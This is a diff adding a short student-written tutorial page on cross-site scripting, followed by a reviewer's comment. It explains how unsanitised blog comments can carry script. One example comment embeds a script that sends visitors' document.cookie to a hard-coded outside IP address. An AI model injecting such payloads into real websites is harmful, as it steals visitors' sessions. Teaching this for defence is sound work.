contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -0,0 +1,102 @@
+# Cross Site Scripting
+
+Author: [Tan Wang Leng](https://github.com/nus-oss/cs3281-website/tree/master/students/AY1617S2/tanWangLeng/TanWangLeng-Resume.md)
+
+## Overview
+
+Cross site scripting (XSS) is a vulnerability found in websites.
+
+Text boxes are commonly used in forms in websites to ask the user for input. For
+example, blog websites may provide a text box for visitors of the blog to enter comments.
+
+However, are commenters limited to just typing in plain text? Some websites do not
+check the input, thus commenters are able to use formatting HTML tags, such
+as `<b>` for bolding and `<i>` for italicizing.
+
+```html
+I <b>like</b> your blog post!
+```
+
+becomes: I **like** your blog post!
+
+The problem arises when the commenter starts using HTML for malicious purposes. For
+example, HTML also supports `<script>`, for you to write JavaScript code on the
+webpage as well.
+
+```html
+This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
+```
+
+While visitors of the blog will only see the non-script portion of the
+comments (i.e. `This is an innocent looking comment.`), the browser will not
+show the script portion of the comment, because it is legal HTML (you won't see
+the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see
+`<script>` on the webpage).
+
+However, the browser is **actually executing the script**, without the visitor even being aware of what's going on.
+
+This means that any malicious users (i.e. hackers) can write a script on their comments, such that everyone that visits the website will have the script executed. The script can be malicious in nature (in our example, the script sends the cookie of the visitor to the hacker).
+
+Therefore, the hacker has managed to add additional malicious "functionality" to
+the website, that is not intended by the original website developer.
```

Comment:
Perhaps a mention of how the name `cross site scripting` matches what it refers to.